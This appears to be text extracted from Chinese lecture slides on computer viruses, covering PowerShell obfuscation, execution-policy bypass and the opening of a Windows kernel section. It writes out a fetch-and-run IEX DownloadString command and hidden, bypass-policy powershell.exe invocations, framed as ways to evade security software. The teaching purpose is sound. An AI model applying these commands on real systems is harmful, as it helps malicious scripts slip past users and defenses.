常用于命令本身的混淆技術(shù)1）采用別名/縮寫方法2）使用Invoke命令3）使用NewScriptBlock命令4）使用Invoke-Command命令Powershell混淆技術(shù)--(1)針對命令本身的混淆技術(shù)采用別名/縮寫方法由于某些敏感命令會被安全軟件攔截，此時(shí)可嘗試使用命令別名/縮寫方式執(zhí)行。Powershell的命令支持別名或縮寫方式輸入。在Powershell中輸入alias命令即可查看所有命令的別名/縮寫。Invoke命令在Powershell中，可使用invoke命令調(diào)用其他命令，從而達(dá)到混淆目的。可使用Invoke-Expression(New-ObjectSystem.Net.WebClient).DownloadString(":8000/gpnu.txt")來替換原來的IEX(New-ObjectSystem.Net.WebClient).DownloadString(":8000/gpnu.txt")盡管這兩條命令看似不同，但其執(zhí)行結(jié)果相同。NewScriptBlock命令

在Powershell中，可使用$ExecutionContext.InvokeCommand.NewScriptBlock(“”)的方式創(chuàng)建腳本塊，再將需要執(zhí)行的語句嵌入其中，也可達(dá)到混淆目的Invoke-Command命令由于Invoke-Command命令具有執(zhí)行其他命令的功能，可將

InvokeExpression命令行嵌入

Invoke-Command命令中以達(dá)到混淆目的常用于針對函數(shù)與對象的混淆技術(shù)1）采用大小寫與特殊字符2）采用字符串變換

Powershell混淆技術(shù)--(2)針對函數(shù)與對象的混淆技術(shù)Powershell混淆技術(shù)--(2)針對函數(shù)與對象的混淆技術(shù)采用大小寫與特殊字符首先Powershell對于大小寫不敏感，可采用大小寫搭配方式進(jìn)行混淆。其次可在Powershell腳本中增加空格，通常不會影響腳本運(yùn)行,以達(dá)到混淆目的。最后還可在腳本中的對象函數(shù)上使用“括號與引號”，將其轉(zhuǎn)化為字符串執(zhí)行，以達(dá)到混淆目的。Powershell混淆技術(shù)--(2)針對函數(shù)與對象的混淆技術(shù)采用字符串變換首先可在字符串中使用Split與Join或者Replace等方法分割、替換原來的Powershell命令行字符串。其次可使用引號對Powershell命令行字符進(jìn)行分段拼接。最后可將Powershell命令行字符串進(jìn)行反轉(zhuǎn)，以達(dá)到混淆目的。常用于針對參數(shù)的混淆技術(shù)1）采用base64編碼2）采用SecureString混淆

Powershell混淆技術(shù)--(3)針對參數(shù)的混淆技術(shù)Powershell混淆技術(shù)--(3)針對參數(shù)的混淆技術(shù)采用base64編碼首先可使用base64編碼對參數(shù)進(jìn)行混淆，再使用Powershell–EncodedCommand命令來解碼執(zhí)行。其次還可將要執(zhí)行的Powershell命令行進(jìn)行base64編碼。最后使用FromBase64String函數(shù)，將經(jīng)過base64編碼后的命令解碼為正常的Powershell命令執(zhí)行，以達(dá)到混淆目的。SecureString是一種加解密方式。通過密鑰對Powershell腳本進(jìn)行加解密，以實(shí)現(xiàn)腳本混淆。除此之外，還有很多針對Powershell腳本的混淆工具，例如，Invoke-Obfuscation、Invoke-CraftCraft、Chimera等等?？衫眠@些混淆工具對Powershell腳本進(jìn)行有針對性地混淆。Powershell混淆技術(shù)--(3)針對參數(shù)的混淆技術(shù)采用base64編碼Powershell繞過技術(shù)背景分類攻擊載體（計(jì)算機(jī)病毒）在傳播至目標(biāo)系統(tǒng)后，通常面臨著本地執(zhí)行策略與安全軟件的攔截與查殺。由于Powershell默認(rèn)的執(zhí)行策略是Restricted，即執(zhí)行受限模式。如要運(yùn)行Powershell腳本，則須將Restricted策略更改成Unrestricted

或Bypass。為了能成功執(zhí)行，Powershell類惡意腳本需要采取相應(yīng)的繞過技術(shù)，常用的繞過技術(shù)大致包括如下三類：⑴繞過本地權(quán)限執(zhí)行。⑵隱藏繞過權(quán)限執(zhí)行。⑶用IEX遠(yuǎn)程下載并繞過權(quán)限執(zhí)行?；A(chǔ)知識

Powershell繞過技術(shù)--(1)繞過本地權(quán)限執(zhí)行在將Powershell腳本gpnu.ps1上傳至目標(biāo)系統(tǒng)后，通過修改執(zhí)行策略為Bypass（PowerShell.exe-ExecutionPolicyBypass）來繞過本地默認(rèn)的執(zhí)行策略，在CMD環(huán)境下輸入如下命令即可繞過執(zhí)行策略并順利運(yùn)行該腳本。Powershell腳本在目標(biāo)系統(tǒng)執(zhí)行時(shí)，如能隱匿執(zhí)行自身，則可有效規(guī)避用戶和安全軟件，達(dá)到繞過目的。Powershell繞過技術(shù)--(2)隱藏繞過權(quán)限執(zhí)行輸入命令來隱藏繞過權(quán)限執(zhí)行powershell.exe–ExecutionPolicybypass-WindowStylehidden-NoProfileh:\tests\gpnu.ps1采用別名縮寫方式輸入命令powershell.exe-execbypass-whidden-noph:\tests\gpnu.ps1在CMD環(huán)境中執(zhí)行上述腳本后將會自動(dòng)退出CMD命令提示符環(huán)境，從而達(dá)到既繞過本地執(zhí)行權(quán)限又隱匿執(zhí)行并退出目的。Powershell繞過技術(shù)—(3)用IEX遠(yuǎn)程下載并繞過權(quán)限執(zhí)行利用Powershell的IEX（Invoke-Expression）命令從遠(yuǎn)程下載Powershell腳本至內(nèi)存執(zhí)行，使用的命令如下。Windows內(nèi)核機(jī)制Windows系統(tǒng)體系結(jié)構(gòu)Windows的分段與分頁Windows系統(tǒng)服務(wù)調(diào)用機(jī)制3Windows內(nèi)核機(jī)制——（1）體系結(jié)構(gòu)從本質(zhì)上說，計(jì)算機(jī)病毒（Rootkit）會充分利用、破壞Windows系統(tǒng)內(nèi)核以實(shí)現(xiàn)其隱匿攻擊目的。為更好地理解計(jì)算機(jī)病毒（Rootkit）的隱匿機(jī)制，需了解Windows系統(tǒng)內(nèi)核結(jié)構(gòu)和關(guān)鍵組件及其功能。Windows內(nèi)核機(jī)制——（1）體系結(jié)構(gòu)Windows系統(tǒng)采用層次化設(shè)計(jì)，自底向上可分為3層硬件抽象層（HardwareAbstractionLayer）內(nèi)核層（OSKernelLayer）應(yīng)用層（ApplicationLayer）Windows內(nèi)核機(jī)制——（1）體系結(jié)構(gòu)硬件抽象層的設(shè)計(jì)目的是將硬件差異封裝起來，從而為操作系統(tǒng)上層提供一個(gè)抽象一致的硬件資源模型。內(nèi)核層實(shí)現(xiàn)操作系統(tǒng)的基本機(jī)制和核心功能，并向上層提供一組系統(tǒng)服務(wù)調(diào)用API（ApplicationProgrammingInterface）函數(shù)。應(yīng)用層通過調(diào)用系統(tǒng)內(nèi)核層提供的API函數(shù)實(shí)現(xiàn)自身功能。自底向上Windows內(nèi)核機(jī)制——（1）體系結(jié)構(gòu)優(yōu)點(diǎn)存在漏洞Windo